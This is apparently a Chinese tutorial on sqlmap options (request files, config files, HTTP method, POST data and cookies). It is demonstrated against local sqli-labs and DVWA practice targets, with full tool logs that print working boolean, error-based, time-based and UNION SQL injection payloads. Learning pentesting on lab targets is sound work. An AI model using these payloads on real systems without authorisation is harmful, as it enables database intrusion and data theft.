[20:11:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:13:08] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:13:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:13:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:14:10] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:14:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:16:16] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[20:16:19] [INFO] testing 'Generic inline queries'
[20:16:22] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:16:22] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[20:17:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:17:34] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:17:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:19:34] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:20:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[20:21:08] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]

[20:21:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:23:13] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:26:48] [INFO] target URL appears to have 219 columns in query
[20:26:48] [WARNING] applying generic concatenation (CONCAT)
[20:39:22] [WARNING] there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests
[20:39:22] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[20:41:18] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[20:45:14] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[21:10:38] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[00:25:30] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[00:25:31] [CRITICAL] unable to connect to the target URL
[00:25:31] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[00:25:31] [CRITICAL] unable to connect to the target URL
[00:25:31] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[00:25:31] [CRITICAL] unable to connect to the target URL
[00:25:31] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
there seems to be a continuous problem with connection to the target. Are you sure that you want to continue? [y/N]

[00:25:31] [ERROR] user quit

[*] ending @ 00:25:31 /2020-02-26/


此时,显然时间更长。
(3)可以将一个HTTP请求保存在文件中,然后使用参数 -r

并保存到target.txt中,内容示例如下:

GET /sqli-labs/Less-2/?id=3 HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF; PHPSESSID=e0c8pbo1jmiji6fjb5gl5e0nug

进行测试:

1
python sqlmap.py -r "xxx\target.txt" --banner

打印

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:20:12 /2020-02-25/

[19:20:12] [CRITICAL] specified HTTP request file 'xxx\target.txt' does not exist

[*] ending @ 19:20:12 /2020-02-25/


此过程较快,是因为有缓存,直接读取本地缓存。
(4)从配置文件sqlmap.conf中读取目标探测,参数是 -c

进行测试:

1
python sqlmap.py -c sqlmap.conf

打印

1
2
3
4
5
6
7
8
9
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.2.31#dev}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[19:27:10] [CRITICAL] missing a mandatory option in the configuration file (direct, url, logFile, bulkFile, googleDork, requestFile or wizard)

提示缺少参数,此时在sqlmap目录下的sqlmap.conf中加入参数:

## Target URL.
## Example: http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2
url = http://127.0.0.1/sqli-labs/Less-2/?id=3

并保存再次测试得到结果:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:29:50 /2020-02-25/

[19:29:50] [INFO] testing connection to the target URL
[19:29:50] [INFO] checking if the target is protected by some kind of WAF/IPS
[19:29:50] [INFO] testing if the target URL content is stable
[19:29:51] [INFO] target URL content is stable
[19:29:51] [INFO] testing if GET parameter 'id' is dynamic
[19:29:51] [INFO] GET parameter 'id' appears to be dynamic
[19:29:51] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[19:29:51] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[19:29:51] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[19:29:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:29:56] [WARNING] reflective value(s) found and filtering out
[19:29:56] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[19:29:56] [INFO] testing 'Generic inline queries'
[19:29:56] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[19:29:56] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[19:29:56] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[19:29:56] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[19:29:56] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[19:29:56] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[19:29:56] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:29:56] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[19:29:56] [INFO] testing 'MySQL inline queries'
[19:29:56] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[19:29:56] [WARNING] time-based comparison requires larger statistical model, please wait............. (done)
[19:29:57] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[19:29:57] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[19:29:57] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[19:29:57] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[19:29:57] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[19:29:57] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:30:07] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[19:30:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:30:07] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:30:07] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically e
xtending the range for current UNION query injection technique test
[19:30:07] [INFO] target URL appears to have 3 columns in query
[19:30:07] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 2331=2331

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=3 AND (SELECT 7999 FROM(SELECT COUNT(*),CONCAT(0x7162786a71,(SELECT (ELT(7999=7999,1))),0x7178717671,FLOOR(RAND(0)*2))x FROM INFORMATION_S
CHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=3 AND (SELECT 3727 FROM (SELECT(SLEEP(5)))RGAJ)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-8029 UNION ALL SELECT NULL,CONCAT(0x7162786a71,0x79644646714470516f6d4342496d65754f547961586b55726f6f6f454e4452467659575362594d58,0x71787
17671),NULL-- -
---
[19:30:15] [INFO] the back-end DBMS is MySQL
[19:30:16] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
[19:30:16] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'

[*] ending @ 19:30:16 /2020-02-25/


此时是对目标url进行探测。

二、sqlmap设置请求参数(上)

HTTP请求有很多种方法(method),可以在不同位置(GET、POST、cookie和User-Agent等)携带不同参数。往往只有在特定位置携带了特定参数以特定方法发起的请求才是合法有效的请求。
Sqlmap运行时除了需要指定目标,有时还需要指定HTTP请求的一些细节。

1.HTTP方法

一般来说,Sqlmap能自动判断出是使用GET方法还是POST方法,但在某些情况下需要的可能是PUT等很少见的方法,此时就需要用参数 –method来指定方法。

进行测试:

1
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-2/?id=3 --banner -v 5 --method='put'

打印

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.4.2.31#dev}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appl
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:36:18 /2020-02-25/

[19:36:18] [DEBUG] cleaning up configuration parameters
[19:36:18] [DEBUG] setting the HTTP timeout
[19:36:18] [DEBUG] setting the HTTP User-Agent header
[19:36:18] [DEBUG] creating HTTP requests opener object
[19:36:18] [INFO] resuming back-end DBMS 'mysql'
[19:36:18] [INFO] testing connection to the target URL
[19:36:18] [TRAFFIC OUT] HTTP request [#1]:
'PUT' /sqli-labs/Less-2/?id=3 HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.2.31#dev (http://sqlmap.org)
Host: 127.0.0.1
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

[19:36:18] [DEBUG] declared web page charset 'utf-8'
[19:36:18] [TRAFFIC IN] HTTP response [#1] (200 OK):
Date: Tue, 25 Feb 2020 11:36:18 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://127.0.0.1:80/sqli-labs/Less-2/?id=3
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id ('PUT')
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 2331=2331
    Vector: AND [INFERENCE]

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=3 AND (SELECT 7999 FROM(SELECT COUNT(*),CONCAT(0x7162786a71,(SELECT (ELT(7999=7999,1))),0x7178717671,FLOOR(RAND(0)*2))x FROM INFORMATION_
CHEMA.PLUGINS GROUP BY x)a)
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA
PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=3 AND (SELECT 3727 FROM (SELECT(SLEEP(5)))RGAJ)
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-8029 UNION ALL SELECT NULL,CONCAT(0x7162786a71,0x79644646714470516f6d4342496d65754f547961586b55726f6f6f454e4452467659575362594d58,0x7178
17671),NULL-- -
    Vector:  UNION ALL SELECT NULL,[QUERY],NULL-- -
---
[19:36:18] [INFO] the back-end DBMS is MySQL
[19:36:18] [INFO] fetching banner
[19:36:18] [DEBUG] resuming configuration option 'string' ('Your')
[19:36:18] [PAYLOAD] -5438 UNION ALL SELECT NULL,CONCAT(0x7162786a71,IFNULL(CAST(VERSION() AS NCHAR),0x20),0x7178717671),NULL-- -
[19:36:18] [TRAFFIC OUT] HTTP request [#2]:
'PUT' /sqli-labs/Less-2/?id=-5438%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7162786a71%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x717
717671%29%2CNULL--%20- HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.2.31#dev (http://sqlmap.org)
Host: 127.0.0.1
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

[19:36:18] [TRAFFIC IN] HTTP response [#2] (200 OK):
Date: Tue, 25 Feb 2020 11:36:18 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://127.0.0.1:80/sqli-labs/Less-2/?id=-5438%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7162786a71%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29
2C0x20%29%2C0x7178717671%29%2CNULL--%20-
[19:36:18] [DEBUG] performed 1 queries in 0.05 seconds
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[19:36:18] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'

[*] ending @ 19:36:18 /2020-02-25/


显然请求方法由默认方法get变为put。
大多数情况不需要指定请求方法。

2.sqlmap设置post提交参数

参数:
–data= “xxx”

默认情况下,用于执行HTTP请求的HTTP方法是GET,但是可以通过提供在POST请求中发送的数据隐式的将其改为POST。这些数据作为参数,被用于SQL注入检测。
通过以下方法获取要传入的参数:

得到参数如下:
uname=admin&passwd=admin&submit=Submit
进行测试:

1
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-11/index.php --data="uname=admin&passwd=admin&submit=Submit" --banner

打印

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.4.2.31#dev}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:15:58 /2020-02-25/

[20:15:59] [INFO] testing connection to the target URL
[20:15:59] [INFO] testing if the target URL content is stable
[20:15:59] [INFO] target URL content is stable
[20:15:59] [INFO] testing if POST parameter 'uname' is dynamic
[20:15:59] [INFO] POST parameter 'uname' appears to be dynamic
[20:15:59] [INFO] heuristic (basic) test shows that POST parameter 'uname' might be injectable (possible DBMS: 'MySQL')
[20:15:59] [INFO] heuristic (XSS) test shows that POST parameter 'uname' might be vulnerable to cross-site scripting (XSS) attacks
[20:15:59] [INFO] testing for SQL injection on POST parameter 'uname'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[20:16:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:16:04] [WARNING] reflective value(s) found and filtering out
[20:16:04] [INFO] POST parameter 'uname' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[20:16:04] [INFO] testing 'Generic inline queries'
[20:16:04] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:16:04] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:16:04] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:16:04] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:16:04] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:16:04] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:16:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:16:04] [INFO] POST parameter 'uname' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[20:16:04] [INFO] testing 'MySQL inline queries'
[20:16:04] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:16:04] [WARNING] time-based comparison requires larger statistical model, please wait............. (done)
[20:16:04] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:16:04] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:16:04] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:16:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:16:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:16:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:16:15] [INFO] POST parameter 'uname' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:16:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:16:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:16:15] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically e
xtending the range for current UNION query injection technique test
[20:16:15] [INFO] target URL appears to have 2 columns in query
[20:16:15] [INFO] POST parameter 'uname' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 48 HTTP(s) requests:
---
Parameter: uname (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: uname=admin' AND 7492=7492 AND 'jXXH'='jXXH&passwd=admin&submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: uname=admin' AND (SELECT 7837 FROM(SELECT COUNT(*),CONCAT(0x717a767a71,(SELECT (ELT(7837=7837,1))),0x717a7a7671,FLOOR(RAND(0)*2))x FROM INFOR
MATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'dtOn'='dtOn&passwd=admin&submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=admin' AND (SELECT 7860 FROM (SELECT(SLEEP(5)))PVMp) AND 'CrTc'='CrTc&passwd=admin&submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: uname=-9136' UNION ALL SELECT CONCAT(0x717a767a71,0x725a43566f6467534565694971667541727953454651634263597178416a6871516d64595a6e5052,0x717a7a
7671),NULL-- -&passwd=admin&submit=Submit
---
[20:16:21] [INFO] the back-end DBMS is MySQL
[20:16:21] [INFO] fetching banner
[20:16:21] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[20:16:21] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'

[*] ending @ 20:16:21 /2020-02-25/


3.sqlmap中设置cookie参数

常用参数:

–cookie
–cookie-del
–load-cookies
–drop-set-cookie

使用场景一:

web应用程序具有基于cookie验证的过程,要测试的页面只有在登录状态下才能访问,登录状态用cookie识别,即利用cookie登录网站。
登录dvwa进行配置如下:

得到测试链接:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
不带cookie进行测试:

1
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-11/index.php --data="uname=admin&passwd=admin&submit=Submit" --banner

打印

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:32:53 /2020-02-25/

[20:32:54] [INFO] testing connection to the target URL
got a 302 redirect to 'http://127.0.0.1:80/dvwa/login.php'. Do you want to follow? [Y/n]

you have not declared cookie(s), while server wants to set its own ('PHPSESSID=mo0id4fpa3u...k9jc45seke;security=impossible;security=impossible'). Do you
want to use those [Y/n]

[20:33:02] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:33:02] [INFO] testing if the target URL content is stable
[20:33:02] [WARNING] GET parameter 'id' does not appear to be dynamic
[20:33:02] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[20:33:02] [INFO] testing for SQL injection on GET parameter 'id'
[20:33:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:33:04] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:33:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:33:05] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:33:05] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:33:05] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:33:06] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[20:33:06] [INFO] testing 'Generic inline queries'
[20:33:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:33:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:33:07] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:33:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:33:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:33:08] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[20:33:08] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of re
quests? [Y/n]

[20:33:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:33:13] [WARNING] GET parameter 'id' does not seem to be injectable
[20:33:13] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform m
ore tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper
=space2comment') and/or switch '--random-agent'

[*] ending @ 20:33:13 /2020-02-25/

'Submit' 不是内部或外部命令,也不是可运行的程序
或批处理文件。

显然未达到预期效果,需要加上cookie。
获取cookie如下:

security=low; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF; PHPSESSID=e0c8pbo1jmiji6fjb5gl5e0nug

再次测试:

1
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKX FpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF; PHPSESSID=e0c8pbo1jmiji6fjb5gl5e0nug" --banner --dbs

打印

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:05:46 /2020-02-26/

Cookie parameter 'csrftoken' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N]

[18:05:52] [INFO] testing connection to the target URL
[18:05:52] [INFO] testing if the target URL content is stable
[18:05:52] [INFO] target URL content is stable
[18:05:52] [INFO] testing if GET parameter 'id' is dynamic
[18:05:52] [WARNING] GET parameter 'id' does not appear to be dynamic
[18:05:52] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[18:05:53] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[18:05:53] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[18:05:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:05:56] [WARNING] reflective value(s) found and filtering out
[18:05:57] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:05:57] [INFO] testing 'Generic inline queries'
[18:05:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:05:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:06:01] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[18:06:03] [INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable (with --not-string="Me")
[18:06:03] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
